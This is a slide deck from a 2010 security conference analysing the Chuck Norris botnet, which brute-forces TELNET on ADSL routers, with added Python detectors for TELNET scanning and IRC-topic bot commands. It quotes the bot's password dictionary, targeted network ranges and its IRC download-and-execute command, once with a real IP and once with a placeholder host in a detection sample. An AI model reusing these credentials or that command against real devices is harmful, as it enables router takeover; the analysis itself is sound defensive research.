Embedded Malware – An Analysis of the Chuck Norris Botnet (slide deck)

  1. Embedded Malware – An Analysis of the Chuck Norris Botnet
  P. Čeleda, R. Krejčí, J. Vykopal, M. Drašar
  {celeda|vykopal|drasar}@ics.muni.cz, radek.krejci@mail.muni.cz
  The sixth European Conference on Computer Network Defense – EC2ND, 28-29 October 2010, Berlin, Germany

  2. Part I Botnet Discovery P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 2 / 22

  3. Motivation – What is happening in our network?
  Diagram (built up over four animation steps): several LANs connected to the Internet; a Firewall is added at the Internet border, then AV protection on the clients; the build ends with the callout "But what is happening here?".

  4. (In)visible Embedded Malware
  Client-side anti-* protection is used and well known. What could happen if we attack infrastructure?
  Diagram: a "Chuck Norris Botnet Attack" directed at the Internet infrastructure.

  5. Network Security Monitoring at Masaryk University
  Pipeline shown in four stages:
  NetFlow data generation – FlowMon probes export NetFlow v5/v9;
  NetFlow data collection – a NetFlow collector receives the exports;
  NetFlow data analyses – SPAM detection, worm/virus detection and intrusion detection run on the collected data;
  incident reporting – results are delivered over http to a WWW front end, by mail to a mailbox, and over syslog to a syslog server.

  6. Botnet Discovery
  Worldwide TELNET scan attempts, mostly coming from ADSL connections.

  7. Part II Chuck Norris Botnet

  8. Chuck Norris Botnet in a Nutshell
  - Linux malware – IRC bots with central C&C servers.
  - Attacks poorly-configured Linux MIPSEL devices.
  - Vulnerable devices – ADSL modems and routers.
  - Uses a TELNET brute force attack as the infection vector.
  - Users are not aware of the malicious activities.
  - No anti-malware solution is available to detect it.
  - Discovered at Masaryk University on 2 December 2009.
  - The malware got the Chuck Norris moniker from a comment in its source code: [R]anger Killato : in nome di Chuck Norris ! (Italian: "in the name of Chuck Norris!")

  9. Monitoring of the Botnet
  Botnet infiltration used from 12/2009 to 02/2010.
  Diagram: the bad guy controls the bots through an IRC server; an ASUS WL-500gP router acts as agent-provocateur (a router deliberately exposed to the botnet), and the traffic on its WAN port is mirrored through a TAP to FlowMon (CSIRT-MU) and tcpdump.

  10. Botnet Searching for Vulnerable Devices
  An infected device holds a list of C class networks to scan (85.174., 203.223., 217.236., 222.215., 88.253., 201.1., 200.121., 58.6., 220.240., ...), runs pnscan against port 23 on them, and produces a list of possible victims.

  Table 1: Example of botnet propagation targets.
  IP Range          Owner
  217.236.0.0/16    Deutsche Telekom
  88.253.0.0/16     TurkTelekom
  87.22.0.0/16      Telecom Italia
  220.240.0.0/16    Comindico Australia
  85.174.0.0/16     Volgograd Electro Svyaz
  222.215.0.0/16    China Telecom
  201.1.0.0/16      Telecomunicacoes de Sao Paulo
  200.121.0.0/16    Telefonica del Peru
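The monitoring pipeline of slide 5 and the TELNET scanning of slides 6 and 10 meet in a flow-based check like the one below. It is an added example, not the authors' FlowMon/NetFlow tooling: the flow records are constructed, the tcp_flags field is assumed to be the NetFlow v5 style cumulative OR of TCP flags over the flow, and the min_hosts threshold is an assumed default to tune per network. A source that opens tiny, never-acknowledged connections to TCP/23 on many hosts across several C class (/24) networks is reported, while an administrator's real TELNET sessions are not.

```python
# Added example: flow-based detection of horizontal TELNET scanning, in the
# spirit of the NetFlow-based monitoring on these slides.  Not the authors'
# FlowMon/NetFlow code; the flow records below are constructed.
from collections import defaultdict
from dataclasses import dataclass

SYN = 0x02   # TCP flag bits as carried in the NetFlow v5 tcp_flags field
ACK = 0x10   # (cumulative OR over the flow's packets) -- assumption


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dport: int
    proto: int       # 6 = TCP
    packets: int
    octets: int
    tcp_flags: int


def is_telnet_probe(flow: Flow) -> bool:
    """A scan probe to TCP/23: a tiny flow with SYN set and ACK never seen,
    i.e. a connection attempt the scanner did not complete."""
    return (flow.proto == 6 and flow.dport == 23 and flow.packets <= 3
            and bool(flow.tcp_flags & SYN) and not flow.tcp_flags & ACK)


def slash24(ip: str) -> str:
    """The C class network (/24) an IPv4 address belongs to."""
    return ".".join(ip.split(".")[:3]) + ".0/24"


def detect_telnet_scanners(flows, min_hosts: int = 16):
    """Aggregate probes per source; return {src: (distinct /24s probed,
    distinct hosts probed)} for sources touching at least min_hosts hosts.
    The threshold is an assumed default, to be tuned per network."""
    probed = defaultdict(set)
    for f in flows:
        if is_telnet_probe(f):
            probed[f.src].add(f.dst)
    return {src: (len({slash24(d) for d in dsts}), len(dsts))
            for src, dsts in probed.items() if len(dsts) >= min_hosts}


def sample_flows():
    """Constructed NetFlow-like records: one infected ADSL device probing
    port 23 across four /24s, one admin using TELNET legitimately, and one
    unrelated web flow.  Addresses are private/documentation ranges."""
    flows = []
    for net in ("10.1.0", "10.1.1", "10.2.0", "10.3.0"):
        for host in range(1, 9):
            flows.append(Flow("203.0.113.9", f"{net}.{host}", 23, 6, 1, 60, SYN))
    full = SYN | ACK | 0x08 | 0x01            # SYN, ACK, PSH, FIN: a real session
    for _ in range(3):
        flows.append(Flow("192.0.2.4", "10.1.0.200", 23, 6, 40, 2800, full))
    flows.append(Flow("192.0.2.4", "198.51.100.7", 80, 6, 12, 1500, full))
    return flows


if __name__ == "__main__":
    for src, (nets, hosts) in detect_telnet_scanners(sample_flows()).items():
        print(f"{src}: probed {hosts} hosts in {nets} /24 networks on TCP/23")
```

On the constructed input only 203.0.113.9 is reported (32 hosts in 4 networks); the administrator at 192.0.2.4 is ignored because its flows carry ACK and tens of packets. In a real deployment the probe definition should also consider RST-only replies and the export's flow timeout, and the /24 count is what separates the bot's whole-/16 sweeps from a single misbehaving host.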

  11. Infection of a Vulnerable Device
  The infected device runs a dictionary attack against the victim's TELNET service; once logged in, the victim downloads the current bot version from a web server.

  Table 2: Passwords used for a dictionary attack.
  User    Password
  root    admin, Admin, password, root, 1234, private, XA1bac0MX, adsl1234, %%fuckinside%%, dreambox, blank password
  admin   admin, password, blank password
  1234    1234Admin

  12. Bot Initialization and Further Propagation
  On the infected device the bot first blocks remote access to the device (STOP, ports 22-80), then
  1. joins the channel ##soldiers## on the C&C (IRC) server, and
  2. reads the channel topic, which carries the init-cmd (!*) that fetches the scan tools.
  Initial Command (IRC Topic): :!* sh wget http://87.98.163.86/pwn/scan.sh;chmod u+x scan.sh;./scan.sh
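The bot on this slide takes its orders from the IRC channel topic, so the topic text is the place to look for the C&C channel in captured traffic. The Python below is an added example, not the authors' code: it parses the two IRC messages that carry a topic (the 332 RPL_TOPIC reply a client receives on join, and a TOPIC change), treats a topic starting with the slide's !* prefix as a bot command, and flags a download-and-execute chain (fetch tool plus chmod +x or ./) as the init-cmd shape. The IRC lines are constructed and the host cnc.invalid is a placeholder, not the address on the slide.

```python
# Added example: spotting the C&C command pattern of this slide (a bot joins
# an IRC channel and executes the channel topic) in captured IRC traffic.
# Not the authors' code; the IRC lines are constructed and the C&C host is a
# placeholder, not the address on the slide.
import re

# RPL_TOPIC (numeric 332) replies and TOPIC changes both carry the topic text.
TOPIC_RE = re.compile(
    r"^(?::\S+ )?(?:332 \S+ |TOPIC )(?P<chan>\S+) :(?P<topic>.*)$")
CMD_PREFIX = "!*"          # topic prefix the bot treats as "all bots, run this"
FETCH_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")
EXEC_RE = re.compile(r"chmod\s+[ugoa]*\+x|\./\S+")


def parse_topic(line: str):
    """Return (channel, topic) for a topic-carrying IRC line, else None."""
    m = TOPIC_RE.match(line.strip())
    return (m.group("chan"), m.group("topic")) if m else None


def classify_topic(topic: str) -> str:
    """'init-cmd' for a download-and-execute chain, 'command' for any other
    !*-prefixed topic, 'benign' otherwise."""
    if not topic.startswith(CMD_PREFIX):
        return "benign"
    body = topic[len(CMD_PREFIX):]
    if FETCH_RE.search(body) and EXEC_RE.search(body):
        return "init-cmd"
    return "command"


def scan_irc_log(lines):
    """Return [(line number, channel, verdict)] for every suspicious topic."""
    alerts = []
    for n, line in enumerate(lines, 1):
        parsed = parse_topic(line)
        if parsed is None:
            continue
        chan, topic = parsed
        verdict = classify_topic(topic)
        if verdict != "benign":
            alerts.append((n, chan, verdict))
    return alerts


# Constructed capture: a bot receiving the channel topic on join, a normal
# channel, and a later topic change carrying a plain command.
SAMPLE_IRC = [
    ":irc.example.test 332 bot123 ##soldiers## :!* sh wget http://cnc.invalid/pwn/scan.sh;chmod u+x scan.sh;./scan.sh",
    ":irc.example.test 332 bot123 #linux :Welcome, please read the FAQ first",
    ":oper!op@host.invalid TOPIC ##soldiers## :!* status",
]

if __name__ == "__main__":
    for n, chan, verdict in scan_irc_log(SAMPLE_IRC):
        print(f"line {n}: {verdict} topic in {chan}")
```

Run on the constructed capture, line 1 is reported as init-cmd and line 3 as a plain command, while the #linux topic is left alone. The same check fits a network IDS rule on IRC ports, and it pairs well with the flow-level symptom this slide also shows: a router whose admin ports 22-80 suddenly stop answering after an outbound IRC connection.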
